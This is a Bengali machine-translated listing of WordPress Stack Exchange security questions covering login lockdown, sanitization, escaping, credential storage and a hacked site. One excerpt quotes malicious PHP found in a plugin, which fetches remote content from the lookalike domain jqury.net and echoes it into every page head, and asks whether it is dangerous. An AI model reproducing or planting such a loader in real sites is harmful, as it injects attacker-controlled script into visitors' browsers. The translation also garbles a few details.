প্রশ্ন ট্যাগ «security»

বন্ধ থাকে। এই প্রশ্নটি অফ-টপিক । এটি বর্তমানে উত্তর গ্রহণ করছে না। এই প্রশ্নটি উন্নত করতে চান? প্রশ্ন আপডেট করুন যাতে এটি ওয়ার্ডপ্রেস ডেভেলপমেন্ট স্ট্যাক এক্সচেঞ্জের বিষয়বস্তু । 4 বছর আগে বন্ধ ছিল । আমি প্লাগইন সরল লগইন লকডাউন ইনস্টল করেছি এবং দিন দুয়েক আগে থেকে ডাটাবেসটি দিনে 200 রেকর্ড …

20 login  security 

আমি ওয়ার্ডপ্রেসে নতুন। হ্যাকাররা কীভাবে প্লাগিনগুলিতে দুর্বলতাগুলি কাজে লাগাতে পারে সে সম্পর্কে আমি সম্প্রতি একটি নিবন্ধ পড়েছি। গুগল পেজস্পিডের মতো বিভিন্ন উত্সও আমাকে প্লাগইন ব্যবহার থেকে বিরত করেছে বা কমপক্ষে এটি সর্বনিম্ন রাখবে। ব্যক্তিগতভাবে, আমি প্লাগইনগুলি এড়াতে চেষ্টা করি কারণ আমার সাইটে যা ঘটে থাকে তার নিয়ন্ত্রণে আমি আরও বেশি …

19 plugins  security 

আমার এক ক্লায়েন্ট ছিল যিনি সম্প্রতি হ্যাক হয়ে গিয়েছিলেন এবং আমি লক্ষ্য করেছি যে তার সাইটে we এবং like এর মতো অদ্ভুত চরিত্রগুলি উপস্থিত হয়েছিল Æ দেখা যাচ্ছে যে হ্যাকাররা ডেটাবেজে wp_optionsটেবিলের ব্লগ_চারসেটটিকে ইউটিএফ -7 এ পরিবর্তন করেছে । আমি এটি আবার ইউটিএফ -8 এ সেট করেছিলাম, তবে আমি ভাবছিলাম …

19 security  encoding  hacked  characters 

আমি বর্তমানে একটি প্লাগইন বিকাশ করছি এবং সম্ভাবনা হ'ল আমি সম্ভবত এটি পাবলিক প্লাগইন সংগ্রহস্থলে প্রকাশ করব যাতে অন্যরা এটি ব্যবহার করতে পারে। প্লাগইনটি একটি এআইপিআই ব্যবহার করবে এবং এই এপিআই ব্যবহার করতে আপনাকে একটি ব্যবহারকারীর নাম এবং পাসওয়ার্ড পাস করতে হবে। সুতরাং আমার প্লাগইনকে এই লগইন শংসাপত্রগুলি ডাটাবেসে সংরক্ষণ …

19 plugin-development  security  api  encryption 

আমি এটি একটি প্লাগইনে পেয়েছি। এটার কাজ কি? এটা কি বিপদজনক? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }

17 plugins  wp-admin  security  curl 

আমি নিশ্চিত করতে চাই যে আমার প্লাগিনগুলি / থিমগুলির সমস্ত ডেটা ডাটাবেসে প্রবেশের আগে এবং ব্রাউজারে আউটপুট দেওয়ার আগে সুরক্ষিতভাবে পরিচালনা করা হয়েছে। আমার সমস্যাটি হ'ল এমন পরিস্থিতি রয়েছে যেখানে API আপনার জন্য স্যানিটাইজেশন পরিচালনা করে - যেমন পোস্ট মেটা ক্ষেত্রগুলি সংরক্ষণ করার সময় - এবং প্লাগইন / থিম লেখক …

17 plugin-development  security  customization  validation  sanitization 

ওয়ার্ডপ্রেসের নতুন সংস্করণগুলিতে কি কিপিং wp-admin/install.phpএবং wp-admin/install-helper.phpসুরক্ষা ফাঁস হচ্ছে? ডিফল্টরূপে এই ফাইলগুলিতে ফাইলের অনুমতি 64৪৪। যদি কোন ফুটো থাকে তবে কেমন দয়া করে?

16 security  installation 

যেমনটি বর্তমানে দাঁড়িয়ে আছে, এই প্রশ্নটি আমাদের প্রশ্নোত্তর বিন্যাসের জন্য উপযুক্ত নয়। আমরা উত্তরগুলি তথ্য, তথ্যসূত্র বা দক্ষতার দ্বারা সমর্থন করা আশা করি তবে এই প্রশ্নটি সম্ভবত বিতর্ক, যুক্তি, পোলিং বা বর্ধিত আলোচনার জন্য অনুরোধ করবে। আপনি যদি মনে করেন যে এই প্রশ্নটি উন্নত এবং সম্ভবত পুনরায় খোলা যেতে পারে …

16 plugins  plugin-development  security  sql 

আমি দেখতে পাচ্ছি যে মিডিয়া আপলোডারে এসভিজিগুলি ডিফল্টরূপে অবরুদ্ধ রয়েছে এবং আপনাকে এগুলি ফাংশন.এফপিকে একটি সমর্থিত এমআইএমআই টাইপ হিসাবে যুক্ত করতে হবে। এর পিছনে কোন সুরক্ষার কারণ রয়েছে?

15 media  security  svg 

আমি কোডটি দেখেছিলাম তবে ফ্যানসিউন the_title the_content the_excerptইত্যাদির মতো কোনও পালানো দেখতে পেলাম না আমি এটি সঠিকভাবে পড়তে পারি না। থিম বিকাশে এই ফাংশনগুলি কী আমার এড়াতে হবে: esc_html ( the_title () ) সম্পাদনা করুন: উপরোক্ত কোডের নীচে উত্তরগুলিতে নির্দেশিত হিসাবে ভুল নির্বিশেষে - কোডটি পড়া উচিত ছিল esc_html ( …

15 security  escaping 

বাহ্যিক বিকাশকারীকে নিয়ে আমাদের কিছু সমস্যা রয়েছে। আমরা wp-adminকেবলমাত্র ( ভিপিএন এর মাধ্যমে ) অভ্যন্তরীণ অ্যাক্সেসের জন্য সাইটের অ্যাক্সেসকে সীমাবদ্ধ করতে চাই । কেবল তাই এটি বাহ্যিক ব্যবহারকারীদের দ্বারা আক্রমণ করা হবে না। আমরা সাইট থেকে প্রশাসকদের গণনা করতে পারি এবং তাদের ফিশ করা হোক না। আমাদের বিকাশকারী বলছেন যে …

14 admin  ajax  security 

কেবলমাত্র একটি দ্রুত প্রশ্ন যা সুরক্ষায় কিছুটা সহায়তা করতে পারে। আমি লক্ষ্য করেছি যে readme.html ফাইলটির সংস্করণ নম্বর তালিকাভুক্ত রয়েছে। এটি প্রতিটি আপগ্রেডের পরে পুনরায় প্রদর্শিত হয় এবং তাই লাইসেন্স.txt এবং ডাব্লুপি-কনফিগারেশন-নমুনা.এফপি করে। কোনও আপগ্রেডের পরে ওয়ার্ডপ্রেস স্বয়ংক্রিয়ভাবে এই ফাইলগুলি সরানোর কী সহজ উপায় আছে? আমি ইতিমধ্যে মেটা ট্যাগ, আরএসএস …

13 security  wp-config 

অ্যাপ্লিকেশনটির মধ্যে আপডেট করার জন্য ওয়ার্ডপ্রেস কনফিগার করা (অর্থাত্ ওয়ার্ডপ্রেস) এর সুবিধার কারণে এটি আমার পক্ষে আদর্শ। তবুও, আমি প্রয়োজনীয়তা দ্বারা অস্থির। অনুরোধ করা ক্ষেত্রগুলি যা পিএইচপি জন্য ssh2 ইনস্টল করার পরে প্রদর্শিত হয় কেবল আমার পাবলিক কী নয়, তবে আমার ব্যক্তিগত কীও জিজ্ঞাসা করে। আমি মনে করব যে, সর্বাধিক, …

13 security  updates  ssh 

ডাব্লুপি_সিন্ট_পোস্টের জন্য কোডেক্সের দিকে তাকানো (এতে) উল্লেখ করা হয়েছে যে এই ফাংশনটি "... ভেরিয়েবলকে স্যানিটাইজ করে, কিছু পরীক্ষা করে, তারিখ / সময় ইত্যাদি অনুপস্থিত ভেরিয়েবলগুলিতে পূরণ করে" (EDIT: আমি আরও শক্তিশালী উদাহরণ অন্তর্ভুক্ত করার জন্য কোডেক্স এন্ট্রি আপডেট করেছি এতে সুরক্ষার পাশাপাশি পোস্ট মেটা এবং বিভাগের কার্যভার অন্তর্ভুক্ত রয়েছে) এক্সএসএস …

13 security  sanitization 

এই জিনিসটি আমার কোডিংকে কঠিন করে তোলে। ওয়ার্ডপ্রেস কোডেক্স সুরক্ষার বিষয়ে অস্পষ্টভাবে কথা বলে এস্ক_আরল ব্যবহারের কারণ বলে। তবে আসলেই কি ঝামেলার মূল্য আছে? উদাহরণস্বরূপ, কী গুরুত্বপূর্ণ, তা ব্যবহার করে ব্যবহারিক সুরক্ষা সুবিধা <?php echo esc_url( home_url( '/' ) ); ?> পরিবর্তে <?php echo home_url() ?> পিএস: আমি থিম বিকাশের …

12 security